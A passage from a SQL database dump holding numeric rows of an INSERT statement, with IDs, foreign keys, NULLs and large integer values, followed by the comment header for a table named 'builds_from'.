LL,NULL,NULL,NULL,981,10441),(1276,223,1099,18,1022027,1097,1098,NULL,NULL,8955,8510),(1277,223,1099,14,1164724,NULL,NULL,NULL,NULL,4318,13875),(1278,222,1800,5,1678465,1101,NULL,NULL,NULL,5846,6396),(1279,223,NULL,19,2052721,1096,1099,1100,NULL,9767,10113),(1280,223,1098,15,2058039,NULL,NULL,NULL,NULL,7943,13411),(1281,223,NULL,24,2086578,NULL,NULL,NULL,NULL,13327,8226),(1282,223,1096,20,2533554,1097,1100,NULL,NULL,11134,11207),(1283,223,1096,21,2543453,1097,1100,NULL,NULL,11598,11667),(1284,222,NULL,10,2584849,NULL,NULL,NULL,NULL,10504,1029),(1285,223,1098,16,2791000,1097,1099,NULL,NULL,10481,13650),(1286,223,1099,17,2809550,1096,1097,1100,NULL,11261,13676),(1287,223,1099,22,2833896,1096,1097,1100,NULL,12611,13084),(1288,223,1099,22,2837163,1096,1097,1100,NULL,13052,12612),(1289,224,1114,10,714304,1115,NULL,NULL,NULL,10504,1029),(1290,225,NULL,14,742387,NULL,NULL,NULL,NULL,4318,13875),(1291,224,1114,5,882201,1113,NULL,NULL,NULL,5846,6396),(1292,224,1114,1,1111123,1115,NULL,NULL,NULL,981,10441),(1293,225,1109,18,1215285,1106,1107,1108,1110,8955,8510),(1294,224,1114,2,1535554,NULL,NULL,NULL,NULL,1512,6699),(1295,225,1109,19,1568233,1106,1107,NULL,NULL,9767,10113),(1296,225,1109,23,2034364,1110,NULL,NULL,NULL,13866,4505),(1297,224,1113,6,2043964,1114,NULL,NULL,NULL,5048,4812),(1298,224,1113,7,2051672,1114,NULL,NULL,NULL,3651,3696),(1299,224,NULL,8,2086255,1112,1115,NULL,NULL,3203,3208),(1300,224,1114,9,2094148,1111,1112,1115,NULL,1748,2270),(1301,224,NULL,9,2098153,1111,1112,1114,NULL,2177,1807),(1302,226,1124,10,629870,NULL,NULL,NULL,NULL,10504,1029),(1303,227,NULL,14,717670,1802,NULL,NULL,NULL,4318,13875),(1304,226,1123,1,926580,1125,NULL,NULL,NULL,981,10441),(1305,226,1124,5,1296427,NULL,NULL,NULL,NULL,5846,6396),(1306,226,1124,11,1457879,1122,1123,1125,NULL,6919,1483),(1307,227,1118,18,1895925,1119,NULL,NULL,NULL,8955,8510),(1308,226,1124,6,1963761,1122,1123,1125,NULL,5048,4812),(1309,226,1124,7,1972620,1121,1122,1123,1125,3651,3696),(1310,226,NULL,8,1976927,1121,1122,1123,NULL,3203,3208),(1311,226,1121,9,1984324,1122,1123,1124,1125,1748,2270),(1312,226,1124,9,1992400,1121,1122,1123,1125,2177,1807),(1313,227,1119,23,2069778,1116,1120,NULL,NULL,13866,4505),(1314,227,1119,24,2091230,1116,1802,1120,NULL,13327,8226),(1315,229,1129,14,243515,1130,NULL,NULL,NULL,4318,13875),(1316,228,1134,10,271775,1131,NULL,NULL,NULL,10504,1029),(1317,229,1126,23,653881,1129,NULL,NULL,NULL,13866,4505),(1318,229,1130,18,909872,1127,1803,1129,NULL,8955,8510),(1319,228,1134,1,1036695,1132,NULL,NULL,NULL,981,10441),(1320,228,1132,5,1178123,1133,1135,NULL,NULL,5846,6396),(1321,229,1129,19,1564552,1127,1803,1130,NULL,9767,10113),(1322,228,1134,6,1638417,1133,1135,NULL,NULL,5048,4812),(1323,229,1129,15,1736612,1127,1803,1130,NULL,7943,13411),(1324,229,1126,16,1771406,1127,1803,1129,1130,10481,13650),(1325,229,1129,24,1857010,1126,1130,NULL,NULL,13327,8226),(1326,229,1129,20,2132884,1803,NULL,NULL,NULL,11134,11207),(1327,229,1129,21,2141365,1126,1803,NULL,NULL,11598,11667),(1328,229,1126,17,2627499,NULL,NULL,NULL,NULL,11261,13676),(1329,228,1134,7,2632179,1135,NULL,NULL,NULL,3651,3696),(1330,229,NULL,21,2750708,NULL,NULL,NULL,NULL,11598,11667),(1331,228,NULL,11,2776214,NULL,NULL,NULL,NULL,6919,1483),(1332,228,NULL,12,2835588,NULL,NULL,NULL,NULL,4281,1253),(1333,229,1129,22,2882101,1127,NULL,NULL,NULL,13052,12612),(1334,229,1129,22,2884253,1126,1127,NULL,NULL,12611,13084),(1335,241,2109,18,827532,1187,NULL,NULL,NULL,8955,8510),(1336,240,1191,1,857040,1192,NULL,NULL,NULL,981,10441),(1337,241,2110,23,860003,NULL,NULL,NULL,NULL,13866,4505),(1338,241,2110,14,1049885,1187,2109,1190,NULL,4318,13875),(1339,240,1194,2,1201394,1192,NULL,NULL,NULL,1512,6699),(1340,240,1194,10,1391808,NULL,NULL,NULL,NULL,10504,1029),(1341,241,2110,19,1442302,2109,1190,NULL,NULL,9767,10113),(1342,240,1191,5,1618984,1192,1193,NULL,NULL,5846,6396),(1343,241,NULL,24,1663002,NULL,NULL,NULL,NULL,13327,8226),(1344,240,1191,6,2238008,1193,NULL,NULL,NULL,5048,4812),(1345,240,1193,7,2273057,1195,NULL,NULL,NULL,3651,3696),(1346,240,1194,8,2277089,1191,1192,1193,1195,3203,3208),(1347,240,1193,9,2290986,1191,1194,1195,NULL,1748,2270),(1348,240,1195,9,2295513,1191,1192,1193,1194,2177,1807),(1349,243,1199,23,529793,1200,NULL,NULL,NULL,13866,4505),(1350,243,NULL,14,835054,1196,1199,1200,NULL,4318,13875),(1351,242,1203,5,1129150,1201,NULL,NULL,NULL,5846,6396),(1352,242,1201,1,1252807,NULL,NULL,NULL,NULL,981,10441),(1353,242,1204,10,1582747,1201,NULL,NULL,NULL,10504,1029),(1354,243,1199,18,1626765,1197,1198,NULL,NULL,8955,8510),(1355,242,1204,6,1749945,1201,1202,1205,NULL,5048,4812),(1356,242,NULL,2,1934255,NULL,NULL,NULL,NULL,1512,6699),(1357,243,NULL,24,2334715,1199,1200,NULL,NULL,13327,8226),(1358,242,NULL,7,2478056,1203,1204,NULL,NULL,3651,3696),(1359,242,1201,8,2482244,1202,1203,1204,NULL,3203,3208),(1360,242,1204,9,2491067,1201,1202,1203,NULL,1748,2270),(1361,242,1201,9,2493290,1202,1203,1204,NULL,2177,1807),(1362,244,1214,10,836730,1215,NULL,NULL,NULL,10504,1029),(1363,245,NULL,23,896724,NULL,NULL,NULL,NULL,13866,4505),(1364,245,1209,14,986510,1210,NULL,NULL,NULL,4318,13875),(1365,245,1209,18,1189727,1206,1208,NULL,NULL,8955,8510),(1366,245,1206,19,1444077,NULL,NULL,NULL,NULL,9767,10113),(1367,244,1214,1,1576640,NULL,NULL,NULL,NULL,981,10441),(1368,245,NULL,15,1742941,1207,NULL,NULL,NULL,7943,13411),(1369,245,1209,16,1765477,1206,1208,1210,NULL,10481,13650),(1370,245,1206,17,1770496,1208,1209,1210,NULL,11261,13676),(1371,245,1206,22,1784584,1207,1208,1209,1210,12611,13084),(1372,244,NULL,11,1811597,NULL,NULL,NULL,NULL,6919,1483),(1373,244,1211,5,1820547,NULL,NULL,NULL,NULL,5846,6396),(1374,245,1208,22,2016896,NULL,NULL,NULL,NULL,13052,12612),(1375,246,NULL,1,266129,1221,1225,NULL,NULL,981,10441),(1376,247,1219,23,295958,1220,NULL,NULL,NULL,13866,4505),(1377,246,1224,10,430889,NULL,NULL,NULL,NULL,10504,1029),(1378,247,1219,14,451988,1220,NULL,NULL,NULL,4318,13875),(1379,246,1224,5,844006,1223,NULL,NULL,NULL,5846,6396),(1380,247,1219,15,938860,1218,1220,NULL,NULL,7943,13411),(1381,247,1219,16,1338220,1216,1217,1218,1220,10481,13650),(1382,247,NULL,18,1454075,1218,NULL,NULL,NULL,8955,8510),(1383,247,1219,24,1455154,NULL,NULL,NULL,NULL,13327,8226),(1384,247,1218,17,1655094,1217,1219,1220,NULL,11261,13676),(1385,247,1218,19,1812705,1217,1219,1220,NULL,9767,10113),(1386,247,NULL,22,1923546,NULL,NULL,NULL,NULL,12611,13084),(1387,247,1218,17,2042140,1219,1220,NULL,NULL,11261,13676),(1388,247,1220,20,2107223,1216,1217,1218,1219,11134,11207),(1389,247,1218,21,2111759,1216,1219,1220,NULL,11598,11667),(1390,247,1219,22,2123485,1217,1218,NULL,NULL,13052,12612),(1391,248,2115,10,263606,1235,NULL,NULL,NULL,10504,1029),(1392,249,1229,14,605657,NULL,NULL,NULL,NULL,4318,13875),(1393,249,1229,18,1117374,1226,NULL,NULL,NULL,8955,8510),(1394,249,1226,23,1169709,1229,1230,NULL,NULL,13866,4505),(1395,248,2113,5,1176400,1232,NULL,NULL,NULL,5846,6396),(1396,248,2115,1,1257374,1231,2113,1235,NULL,981,10441),(1397,249,1229,19,1657094,1230,NULL,NULL,NULL,9767,10113),(1398,249,1230,15,1708825,1226,1227,1229,NULL,7943,13411),(1399,249,1229,24,2254901,1226,NULL,NULL,NULL,13327,8226),(1400,248,2115,6,2337803,1231,2113,NULL,NULL,5048,4812),(1401,248,1232,7,2345692,1231,2113,2115,NULL,3651,3696),(1402,248,1231,8,2350404,1232,2113,2115,NULL,3203,3208),(1403,248,NULL,11,2533102,NULL,NULL,NULL,NULL,6919,1483),(1404,249,NULL,25,2789479,NULL,NULL,NULL,NULL,13624,10572),(1405,249,1230,26,2794200,1227,2116,1229,NULL,13604,11316),(1406,249,1226,20,2814573,1227,2116,1229,1230,11134,11207),(1407,249,1229,21,2817588,1226,1227,2116,1230,11598,11667),(1408,249,2116,16,2997212,1227,1229,1230,NULL,10481,13650),(1409,249,1229,17,3000957,1227,2116,1230,NULL,11261,13676),(1410,249,1229,22,3010166,NULL,NULL,NULL,NULL,13052,12612),(1411,249,NULL,22,3024621,1227,1230,NULL,NULL,12611,13084),(1412,251,1239,23,501229,NULL,NULL,NULL,NULL,13866,4505),(1413,250,1244,10,891012,NULL,NULL,NULL,NULL,10504,1029),(1414,250,NULL,1,926067,NULL,NULL,NULL,NULL,981,10441),(1415,250,1243,5,927793,NULL,NULL,NULL,NULL,5846,6396),(1416,251,NULL,14,1068996,NULL,NULL,NULL,NULL,4318,13875),(1417,250,1244,11,1136742,NULL,NULL,NULL,NULL,6919,1483),(1418,251,1239,18,1794483,1236,1238,NULL,NULL,8955,8510),(1419,250,1243,6,1845142,1242,1245,NULL,NULL,5048,4812),(1420,250,1245,2,1868096,1243,NULL,NULL,NULL,1512,6699),(1421,250,1241,3,1991580,1242,1243,1244,1245,1169,4287),(1422,250,1241,4,1996201,1242,1243,1244,1245,1171,3571),(1423,251,1239,19,2404855,1236,1238,NULL,NULL,9767,10113),(1424,251,NULL,15,2446241,NULL,NULL,NULL,NULL,7943,13411),(1425,251,1239,16,2464313,NULL,NULL,NULL,NULL,10481,13650),(1426,250,1243,7,2549398,1244,NULL,NULL,NULL,3651,3696),(1427,250,1244,8,2589140,NULL,NULL,NULL,NULL,3203,3208),(1428,251,1237,17,2589702,1239,NULL,NULL,NULL,11261,13676),(1429,250,1244,4,2599589,NULL,NULL,NULL,NULL,1171,3571),(1430,250,1241,12,2717895,NULL,NULL,NULL,NULL,4281,1253),(1431,250,1243,9,2819533,1241,1242,1244,NULL,1748,2270),(1432,250,1244,9,2822633,1241,1242,1243,NULL,2177,1807),(1433,253,1246,14,801770,NULL,NULL,NULL,NULL,4318,13875),(1434,252,1252,10,990613,1251,1254,1255,NULL,10504,1029),(1435,253,NULL,18,1173961,1248,1249,NULL,NULL,8955,8510),(1436,252,1253,5,1233284,1254,NULL,NULL,NULL,5846,6396),(1437,253,1249,23,1253259,NULL,NULL,NULL,NULL,13866,4505),(1438,252,NULL,1,1257769,1252,NULL,NULL,NULL,981,10441),(1439,253,1249,19,1390272,NULL,NULL,NULL,NULL,9767,10113),(1440,253,1249,24,2122931,1248,1250,NULL,NULL,13327,8226),(1441,253,1246,15,2145847,NULL,NULL,NULL,NULL,7943,13411),(1442,253,NULL,16,2225436,NULL,NULL,NULL,NULL,10481,13650),(1443,253,1246,17,2244925,NULL,NULL,NULL,NULL,11261,13676),(1444,253,1249,20,2513986,1246,NULL,NULL,NULL,11134,11207),(1445,253,1249,21,2570317,1248,NULL,NULL,NULL,11598,11667),(1446,253,1249,17,2587853,1248,NULL,NULL,NULL,11261,13676),(1447,253,NULL,25,2593558,NULL,NULL,NULL,NULL,13624,10572),(1448,253,1248,22,2835233,1246,1249,1250,NULL,13052,12612),(1449,253,1249,22,2839693,1250,NULL,NULL,NULL,12611,13084),(1450,255,1259,23,271931,NULL,NULL,NULL,NULL,13866,4505),(1451,254,1264,1,304940,NULL,NULL,NULL,NULL,981,10441),(1452,255,1259,14,427510,NULL,NULL,NULL,NULL,4318,13875),(1453,254,1264,10,442546,NULL,NULL,NULL,NULL,10504,1029),(1454,254,1263,11,1141029,NULL,NULL,NULL,NULL,6919,1483),(1455,255,1257,18,1173754,1258,1259,NULL,NULL,8955,8510),(1456,254,1263,5,1200123,1265,NULL,NULL,NULL,5846,6396),(1457,255,NULL,15,1336298,NULL,NULL,NULL,NULL,7943,13411),(1458,254,1261,6,1412587,1262,1264,NULL,NULL,5048,4812),(1459,254,NULL,7,1427282,1261,1262,1265,NULL,3651,3696),(1460,254,1261,8,1675091,1262,1263,1264,1265,3203,3208),(1461,254,1264,9,1871568,1261,1262,1265,NULL,1748,2270),(1462,255,NULL,24,1940364,NULL,NULL,NULL,NULL,13327,8226),(1463,254,1264,8,2098001,1261,1262,1263,1265,3203,3208),(1464,254,1264,9,2107595,1261,1262,1265,NULL,2177,1807),(1465,256,1271,1,1017265,NULL,NULL,NULL,NULL,981,10441),(1466,256,1274,10,1353900,NULL,NULL,NULL,NULL,10504,1029),(1467,257,1269,18,1774414,1268,NULL,NULL,NULL,8955,8510),(1468,257,1269,14,1841071,1267,1270,NULL,NULL,4318,13875),(1469,256,1273,5,1873000,1271,1274,NULL,NULL,5846,6396),(1470,256,1274,6,1886642,1271,1273,NULL,NULL,5048,4812),(1471,257,1268,19,2017934,1267,1269,NULL,NULL,9767,10113),(1472,257,NULL,23,2045400,NULL,NULL,NULL,NULL,13866,4505),(1473,257,1269,20,2055722,1266,1267,1270,NULL,11134,11207),(1474,257,1269,21,2062682,1266,1267,1270,NULL,11598,11667),(1475,257,1268,24,2217157,1267,1269,1270,NULL,13327,8226),(1476,257,1269,25,2250170,1267,1268,NULL,NULL,13624,10572),(1477,257,NULL,15,2255719,NULL,NULL,NULL,NULL,7943,13411),(1478,257,1269,26,2270776,1268,1270,NULL,NULL,13604,11316),(1479,256,1274,7,2678454,2117,1275,NULL,NULL,3651,3696),(1480,256,NULL,8,2687646,1274,1275,NULL,NULL,3203,3208),(1481,256,NULL,2,2715882,NULL,NULL,NULL,NULL,1512,6699),(1482,256,NULL,11,2972770,NULL,NULL,NULL,NULL,6919,1483),(1483,256,1271,12,2996887,NULL,NULL,NULL,NULL,4281,1253),(1484,256,1271,13,3010875,NULL,NULL,NULL,NULL,3452,1236),(1485,257,1266,21,3084704,1267,1268,1270,NULL,11598,11667),(1486,257,1268,22,3095231,1266,1267,1270,NULL,13052,12612),(1487,256,1271,8,3156411,1273,1275,NULL,NULL,3203,3208),(1488,256,NULL,9,3171794,1271,1273,1275,NULL,2177,1807),(1489,256,1274,9,3178986,1271,1273,1275,NULL,1748,2270),(1490,230,1144,10,750619,1145,NULL,NULL,NULL,10504,1029),(1491,231,1136,14,893206,NULL,NULL,NULL,NULL,4318,13875),(1492,230,1143,5,934477,1144,1145,NULL,NULL,5846,6396),(1493,230,1143,1,1042188,1144,1145,NULL,NULL,981,10441),(1494,231,2108,18,1064570,1138,NULL,NULL,NULL,8955,8510),(1495,230,1144,6,1107851,1141,1142,1143,1145,5048,4812),(1496,230,1142,2,1366344,1141,1143,1144,1145,1512,6699),(1497,231,1139,23,1370169,NULL,NULL,NULL,NULL,13866,4505),(1498,231,1136,15,1812565,1138,1139,NULL,NULL,7943,13411),(1499,230,1141,11,2133309,NULL,NULL,NULL,NULL,6919,1483),(1500,231,2108,19,2348375,1136,1138,1139,1140,9767,10113),(1501,231,1138,20,2372061,1136,2108,1139,1140,11134,11207),(1502,231,1139,21,2375259,1136,2108,1138,1140,11598,11667),(1503,231,1136,22,2384829,2108,1138,1139,1140,13052,12612),(1504,231,1139,22,2391221,1136,2108,1138,1140,12611,13084),(1505,155,NULL,18,816680,NULL,NULL,NULL,NULL,8955,8510),(1506,155,752,23,1047035,2106,756,NULL,NULL,13866,4505),(1507,155,NULL,19,1086978,756,NULL,NULL,NULL,9767,10113),(1508,155,754,14,1166542,753,756,NULL,NULL,4318,13875),(1509,155,752,15,1382394,754,NULL,NULL,NULL,7943,13411),(1510,154,760,10,1806193,NULL,NULL,NULL,NULL,10504,1029),(1511,155,752,20,1901060,754,2106,756,NULL,11134,11207),(1512,155,2106,21,1920010,753,754,756,NULL,11598,11667),(1513,155,NULL,24,1975080,753,754,756,NULL,13327,8226),(1514,155,2106,25,2007931,752,753,754,756,13624,10572),(1515,155,754,26,2013164,752,753,2106,756,13604,11316),(1516,155,754,16,2133081,2106,756,NULL,NULL,10481,13650),(1517,155,2106,17,2139230,752,754,756,NULL,11261,13676),(1518,155,NULL,21,2270668,NULL,NULL,NULL,NULL,11598,11667),(1519,155,752,22,2272321,753,2106,756,NULL,13052,12612),(1520,155,NULL,22,2275909,752,754,2106,756,12611,13084),(1521,156,767,1,755813,768,NULL,NULL,NULL,981,10441),(1522,157,764,18,761548,NULL,NULL,NULL,NULL,8955,8510),(1523,157,765,23,1002204,NULL,NULL,NULL,NULL,13866,4505),(1524,157,765,14,1334994,762,764,NULL,NULL,4318,13875),(1525,156,NULL,10,1338809,NULL,NULL,NULL,NULL,10504,1029),(1526,156,769,5,1661592,768,771,NULL,NULL,5846,6396),(1527,156,769,6,2056881,770,771,NULL,NULL,5048,4812),(1528,156,770,7,2066789,768,769,771,NULL,3651,3696),(1529,157,NULL,24,2102187,NULL,NULL,NULL,NULL,13327,8226),(1530,157,765,19,2201108,NULL,NULL,NULL,NULL,9767,10113),(1531,156,769,8,2300673,767,NULL,NULL,NULL,3203,3208),(1532,156,NULL,9,2413861,NULL,NULL,NULL,NULL,1748,2270),(1533,156,NULL,2,2438123,NULL,NULL,NULL,NULL,1512,6699),(1534,157,NULL,25,2495440,NULL,NULL,NULL,NULL,13624,10572),(1535,156,769,9,2516976,770,771,NULL,NULL,2177,1807),(1536,159,775,14,267902,772,773,776,NULL,4318,13875),(1537,158,779,5,696704,777,778,NULL,NULL,5846,6396),(1538,158,777,1,970681,779,NULL,NULL,NULL,981,10441),(1539,159,775,18,975512,NULL,NULL,NULL,NULL,8955,8510),(1540,159,NULL,23,1007231,NULL,NULL,NULL,NULL,13866,4505),(1541,158,779,10,1190825,NULL,NULL,NULL,NULL,10504,1029),(1542,159,774,24,1633215,772,773,775,776,13327,8226),(1543,158,779,2,1639908,NULL,NULL,NULL,NULL,1512,6699),(1544,159,775,25,1647812,772,773,774,776,13624,10572),(1545,159,776,26,1658470,773,774,775,NULL,13604,11316),(1546,159,775,22,1666967,773,774,776,NULL,13052,12612),(1547,159,775,19,1746656,772,773,774,776,9767,10113),(1548,159,772,15,1879246,773,775,776,NULL,7943,13411),(1549,159,775,16,1892333,772,773,776,NULL,10481,13650),(1550,159,NULL,17,1898091,773,775,776,NULL,11261,13676),(1551,159,775,20,1916038,772,773,776,NULL,11134,11207),(1552,159,773,21,2077347,772,775,776,NULL,11598,11667),(1553,159,775,26,2092086,772,773,774,776,13604,11316),(1554,159,NULL,22,2115162,772,NULL,NULL,NULL,12611,13084),(1555,161,NULL,14,212668,785,786,NULL,NULL,4318,13875),(1556,160,NULL,10,237330,791,NULL,NULL,NULL,10504,1029),(1557,161,NULL,23,330844,NULL,NULL,NULL,NULL,13866,4505),(1558,160,790,1,360150,791,NULL,NULL,NULL,981,10441),(1559,161,785,15,880250,786,NULL,NULL,NULL,7943,13411),(1560,160,789,5,1304936,791,NULL,NULL,NULL,5846,6396),(1561,161,784,18,1505330,782,NULL,NULL,NULL,8955,8510),(1562,161,785,24,1647843,782,783,784,786,13327,8226),(1563,161,785,19,1718163,783,784,786,NULL,9767,10113),(1564,161,785,20,1905524,782,783,784,786,11134,11207),(1565,161,785,21,1914874,782,783,784,786,11598,11667),(1566,161,782,22,1922534,783,784,785,786,13052,12612),(1567,161,784,22,2132457,782,785,786,NULL,12611,13084),(1568,162,NULL,5,941159,798,NULL,NULL,NULL,5846,6396),(1569,163,792,14,962104,NULL,NULL,NULL,NULL,4318,13875),(1570,162,800,10,1110220,NULL,NULL,NULL,NULL,10504,1029),(1571,163,792,23,1285741,2123,NULL,NULL,NULL,13866,4505),(1572,163,794,18,1480605,792,793,795,2123,8955,8510),(1573,162,NULL,1,1554359,NULL,NULL,NULL,NULL,981,10441),(1574,163,795,15,2220005,793,NULL,NULL,NULL,7943,13411),(1575,163,NULL,19,2235638,792,NULL,NULL,NULL,9767,10113),(1576,162,800,6,2287688,798,NULL,NULL,NULL,5048,4812),(1577,162,798,7,2362024,797,799,800,801,3651,3696),(1578,162,799,8,2369218,797,798,800,801,3203,3208),(1579,162,799,2,2506744,798,800,NULL,NULL,1512,6699),(1580,162,800,3,2555599,798,801,NULL,NULL,1169,4287),(1581,162,800,4,2559734,797,798,799,801,1171,3571),(1582,162,797,11,2705417,NULL,NULL,NULL,NULL,6919,1483),(1583,163,794,20,2919176,792,795,2123,NULL,11134,11207),(1584,163,795,21,2923345,792,793,794,2123,11598,11667),(1585,163,795,24,2944292,792,794,2123,NULL,13327,8226),(1586,163,792,22,3070102,NULL,NULL,NULL,NULL,13052,12612),(1587,162,799,8,3085651,800,801,NULL,NULL,3203,3208),(1588,162,799,4,3091075,800,801,NULL,NULL,1171,3571),(1589,162,797,12,3223557,NULL,NULL,NULL,NULL,4281,1253),(1590,162,NULL,9,3233263,NULL,NULL,NULL,NULL,1748,2270),(1591,162,NULL,9,3242787,NULL,NULL,NULL,NULL,2177,1807),(1592,162,NULL,13,3258258,NULL,NULL,NULL,NULL,3452,1236),(1593,163,794,21,3267705,793,NULL,NULL,NULL,11598,11667),(1594,163,794,22,3289544,792,793,NULL,NULL,12611,13084);

--
-- Table structure for table `builds_from`
--

